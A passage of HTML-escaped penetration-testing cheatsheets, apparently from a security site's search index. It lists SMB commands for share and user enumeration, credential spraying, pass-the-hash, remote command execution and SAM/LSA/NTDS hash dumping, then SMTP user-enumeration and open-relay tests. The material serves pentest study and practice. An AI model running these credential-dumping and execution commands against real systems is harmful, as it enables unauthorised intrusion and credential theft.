\u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Authenticated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -S \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Shares only\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -U \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Users only\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -P \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Password policy\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Newer (recommended)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux-ng -A \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux-ng -A \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux-ng -A \u0026lt;ip\u0026gt; -oA output\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"smbclient\"\u003esmbclient\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List shares\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient -L //\u0026lt;ip\u0026gt;/ -N \u003cspan style=\"color:#75715e\"\u003e# Null session\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient -L //\u0026lt;ip\u0026gt;/ -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Authenticated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect to share\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -N\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Within smbclient shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003els \u003cspan style=\"color:#75715e\"\u003e# List files\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecd \u0026lt;dir\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Change directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eget \u0026lt;file\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Download file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eput \u0026lt;file\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Upload file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erecurse ON \u003cspan style=\"color:#75715e\"\u003e# Enable recursive operations\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eprompt OFF \u003cspan style=\"color:#75715e\"\u003e# Disable prompts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emget * \u003cspan style=\"color:#75715e\"\u003e# Download everything\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emput * \u003cspan style=\"color:#75715e\"\u003e# Upload everything\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"crackmapexec-cme\"\u003eCrackMapExec (CME)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Authenticated enum\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --shares\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --users\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --groups\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --sessions\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --loggedon-users\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --local-groups\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Credential spraying\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --continue-on-success\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Command execution\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# CMD\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# PowerShell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dump SAM/LSA\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --sam\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --lsa\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -M ntdsutil \u003cspan style=\"color:#75715e\"\u003e# NTDS.dit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"impacket-tools\"\u003eimpacket Tools\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 smbclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 samrdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 rpcdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 lookupsid.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 secretsdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Dump all hashes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 secretsdump.py -just-dc-ntlm \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"mounting-smb-shares\"\u003eMounting SMB Shares\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Linux mount\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;user\u0026gt;,password\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;user\u0026gt;,password\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;pass\u0026gt;,domain\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-vulnerabilities\"\u003eKey Vulnerabilities\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eCVE\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2017-0144\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eEternalBlue / MS17-010\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSMBv1 RCE — WannaCry / NotPetya\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2020-0796\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSMBGhost\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSMBv3.1.1 compression RCE\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2021-34527\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrintNightmare\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint Spooler RCE via SMB\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# EternalBlue check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-vuln-ms17-010 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smb/smb_ms17_010\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# SMBGhost check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-vuln-cve2020-0796 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smb/cve_2020_0796_smbghost\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"SMB"},{"content":"SMTP Enumeration Cheatsheet Default Ports: 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS)\nBanner Grabbing nc -nv \u0026lt;ip\u0026gt; 25 telnet \u0026lt;ip\u0026gt; 25 openssl s_client -starttls smtp -connect \u0026lt;ip\u0026gt;:587 openssl s_client -connect \u0026lt;ip\u0026gt;:465 Manual SMTP Commands HELO \u0026lt;domain\u0026gt; # Basic hello EHLO \u0026lt;domain\u0026gt; # Extended hello (lists capabilities) AUTH LOGIN # Start base64 auth AUTH PLAIN # Plain auth VRFY \u0026lt;user\u0026gt; # Verify if user exists EXPN \u0026lt;list\u0026gt; # Expand mailing list members RCPT TO:\u0026lt;user@domain\u0026gt; # Verify recipient (within MAIL flow) MAIL FROM:\u0026lt;attacker@test.com\u0026gt; RCPT TO:\u0026lt;target@domain\u0026gt; DATA # Begin message body . # End message (single dot on its own line) RSET # Reset connection state QUIT Capabilities Enumeration # See what the server supports after EHLO nc \u0026lt;ip\u0026gt; 25 EHLO test.com # Common capabilities to note: # STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN User Enumeration # smtp-user-enum tool smtp-user-enum -M VRFY -U users.txt -t \u0026lt;ip\u0026gt; smtp-user-enum -M EXPN -U users.txt -t \u0026lt;ip\u0026gt; smtp-user-enum -M RCPT -U users.txt -t \u0026lt;ip\u0026gt; -D \u0026lt;domain\u0026gt; # Manual VRFY loop for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 \u0026lt;ip\u0026gt; 25 2\u0026gt;/dev/null | grep \u0026#34;^250\u0026#34; done # Response codes: # 250 = user exists # 252 = can\u0026#39;t verify but will attempt delivery # 550 = user does not exist Nmap Scripts nmap -p 25 --script smtp-commands \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-enum-users \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-open-relay \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-brute \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-ntlm-info \u0026lt;ip\u0026gt; # Windows NTLM info leak nmap -p 25 --script smtp-vuln-cve2010-4344 \u0026lt;ip\u0026gt; # Exim heap overflow nmap -p 25,587,465 --script smtp-* \u0026lt;ip\u0026gt; Open Relay Testing nc \u0026lt;ip\u0026gt; 25 EHLO test.com MAIL FROM:\u0026lt;attacker@attacker.com\u0026gt; RCPT TO:\u0026lt;victim@external-domain.com\u0026gt; # If accepted = open relay! DATA Subject: relay test This is a test. . QUIT # Automated nmap -p 25 --script smtp-open-relay \\ --script-args smtp-open-relay.from=sender@test.com,smtp-open-relay.to=victim@gmail.com \u0026lt;ip\u0026gt; Metasploit use auxiliary/scanner/smtp/smtp_version use auxiliary/scanner/smtp/smtp_enum use auxiliary/scanner/smtp/smtp_relay NTLM Info Leak (Windows SMTP) # Triggers Windows SMTP servers to reveal hostname, domain, OS version nmap -p 25 --script smtp-ntlm-info \u0026lt;ip\u0026gt; # Manual nc \u0026lt;ip\u0026gt; 25 EHLO test AUTH NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= # Decode the Base64 response with ntlmdecoder or responder Useful Wordlists /usr/share/seclists/Usernames/top-usernames-shortlist.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/smtp/","summary":"\u003ch1 id=\"smtp-enumeration-cheatsheet\"\u003eSMTP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing\"\u003eBanner Grabbing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etelnet \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -starttls smtp -connect \u0026lt;ip\u0026gt;:587\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:465\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"manual-smtp-commands\"\u003eManual SMTP Commands\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eHELO \u0026lt;domain\u0026gt; # Basic hello\nEHLO \u0026lt;domain\u0026gt; # Extended hello (lists capabilities)\nAUTH LOGIN # Start base64 auth\nAUTH PLAIN # Plain auth\nVRFY \u0026lt;user\u0026gt; # Verify if user exists\nEXPN \u0026lt;list\u0026gt; # Expand mailing list members\nRCPT TO:\u0026lt;user@domain\u0026gt; # Verify recipient (within MAIL flow)\nMAIL FROM:\u0026lt;attacker@test.com\u0026gt;\nRCPT TO:\u0026lt;target@domain\u0026gt;\nDATA # Begin message body\n. # End message (single dot on its own line)\nRSET # Reset connection state\nQUIT\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"capabilities-enumeration\"\u003eCapabilities Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# See what the server supports after EHLO\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEHLO test.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Common capabilities to note:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"user-enumeration\"\u003eUser Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# smtp-user-enum tool\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmtp-user-enum -M VRFY -U users.txt -t \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmtp-user-enum -M EXPN -U users.txt -t \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmtp-user-enum -M RCPT -U users.txt -t \u0026lt;ip\u0026gt; -D \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Manual VRFY loop\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e user in \u003cspan style=\"color:#66d9ef\"\u003e$(\u003c/span\u003ecat users.txt\u003cspan style=\"color:#66d9ef\"\u003e)\u003c/span\u003e; \u003cspan style=\"color:#66d9ef\"\u003edo\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e echo VRFY $user | nc -nv -w \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e 2\u0026gt;/dev/null | grep \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;^250\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Response codes:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 250 = user exists\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 252 = can\u0026#39;t verify but will attempt delivery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 550 = user does not exist\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-commands 